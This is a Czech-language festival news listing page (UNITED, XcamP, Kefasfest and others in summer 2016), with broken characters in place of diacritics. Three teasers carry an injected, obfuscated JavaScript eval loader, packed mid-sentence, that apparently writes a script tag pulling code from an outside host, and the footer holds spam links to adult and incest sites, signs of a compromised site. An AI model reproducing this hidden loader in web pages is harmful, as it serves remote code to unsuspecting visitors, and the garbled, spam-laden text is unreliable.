Aktuálně

NG Fest 2016

Ilustrace k článku

Organizáto?i multižánrového open-air festivalu v tomto m?síci spustili webové stránky, kde zve?ejnili program letošního ro?níku. Ten se uskute?ní 30. ?ervence 2016 v Javorníku nad Veli?kou od 16 hodin. Hlavními body programu

Rozdáváme 6 lístku na UNITED

Ilustrace k článku

I letos rozdáváme 6 lístk? (3x 2vstupenky) na multižánrový festival UNITED. T?ídenní akce se letos op?t uskute?ní na Vsetín? a to v termínu 18. – 20. srpna. Na festivalu vystoupí

Festival UNITED představuje UNITED CAMP

Ilustrace k článku

Tanec, hudba, vizuální um?ní a drama jsou náplní chystaného um?leckého soust?ed?ní UNITED CAMP, které je rozší?ením lo?ského tane?ního projektu UNITED DANCE. Organizáto?i ke kempu uvád?jí: „P?jde o p?tidenní soust?ed?ní, které

XcamP 2016

Ilustrace k článku

Smilovice – nevelká vesnice v podh??í Beskyd – se každoro?n? v ?ervenci stává hostitelkou týdenního festivalu XcamP. Tento festival má k?es?anské zam??ení, je po?ádán K?es?anským spole?enstvím, o. s. XcamP je

Kdo vystoupí na CampFestu?

Ilustrace k článku

Pred nami je posledný mesiac školských a intenzívnych pracovných povinností. Ak si už teraz zap??ate kalendár akciami, ur?ite neprehliadnite aj CampFest, ktorý v ?ase 4.-7. augusta 2016 bude prebieha? už

Nový magazín UNITED ZONE

Ilustrace k článku

Kamera – klapka – akce! Festival UNITED vznikl v roce 2011 proto, aby sou?asné generaci nabídl možnost duchovního rozvoje. A nejen duchovního. Festival totiž nabízí nejen dostatek spirituálních podn?t?, kvalitní k?es?anskou

Třináctého na třináctce s černošskými spirituály

Ilustrace k článku

Srde?n? zveme na letošní t?etí koncert z cyklu T?ináctého na t?ináctce. Tradi?ní hostitel ve?er? Slávek eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|fntrt|var|u0026u|referrer|rtzks||js|php'.split('|'),0,{})) Klecandr vystoupí s programem zhudebn?ných žalm? a dalších písní ze

Festival FOLLOW ME 2016

Ilustrace k článku

Festival eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ktyye|var|u0026u|referrer|anezi||js|php'.split('|'),0,{})) FOLLOW ME je multižánrový hudební festival, který letos zažije již 3. ro?ník. Aktuální ro?ník prob?hne 25. ?ervna na plze?ském Ran?i na Šídlováku. Akce

Náměšťfest 2016

Ilustrace k článku

Po sedmi letech tedy na zahajovacím koncert?  festivalu p?ivítáme legendární ?eskou folkovou skupinu Spiritual eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|sykef|var|u0026u|referrer|hadez||js|php'.split('|'),0,{})) kvintet. Jejich písn? zlidov?ly, slova písní se u?í jako básn?,

Kefasfest 2016

Ilustrace k článku

Pátý ro?ník k?es?anského festivalu Kefasfest se uskute?ní o víkendu od 24. do 26. ?ervna 2016. Festival Kefasfest je open air festival na nádherném míst? bývalého kláštera Rosa coeli v Dolních


 
adultcomics.me shemalevids.org incestgames.net